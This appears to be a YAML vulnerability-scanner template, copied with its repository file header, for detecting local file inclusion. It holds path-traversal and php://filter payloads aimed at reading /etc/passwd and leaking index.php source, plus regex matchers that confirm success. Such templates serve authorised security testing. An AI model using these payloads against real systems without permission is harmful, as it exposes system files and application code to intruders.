43 lines
1.1 KiB
YAML
43 lines
1.1 KiB
YAML
id: xpl-lfi-basic
|
|
info:
|
|
name: "Local File Inclusion (LFI)"
|
|
author: imtaqin
|
|
severity: high
|
|
description: |
|
|
Classic path-traversal test across common vulnerable parameters.
|
|
Uses clusterbomb attack to combine traversal depths and payloads.
|
|
tags:
|
|
- lfi
|
|
- path-traversal
|
|
reference:
|
|
- https://owasp.org/www-community/attacks/Path_Traversal
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?page={{fuzz}}"
|
|
- "{{BaseURL}}/?file={{fuzz}}"
|
|
- "{{BaseURL}}/download?file={{fuzz}}"
|
|
- "{{BaseURL}}/view.php?template={{fuzz}}"
|
|
attack: batteringram
|
|
payloads:
|
|
fuzz:
|
|
- "../../../../etc/passwd"
|
|
- "../../../../../../etc/passwd"
|
|
- "....//....//....//etc/passwd"
|
|
- "..%2f..%2f..%2fetc%2fpasswd"
|
|
- "php://filter/convert.base64-encode/resource=index.php"
|
|
stop_at_first_match: true
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
name: etc-passwd
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "^[A-Za-z0-9+/]{100,}={0,2}$"
|
|
name: base64-filter
|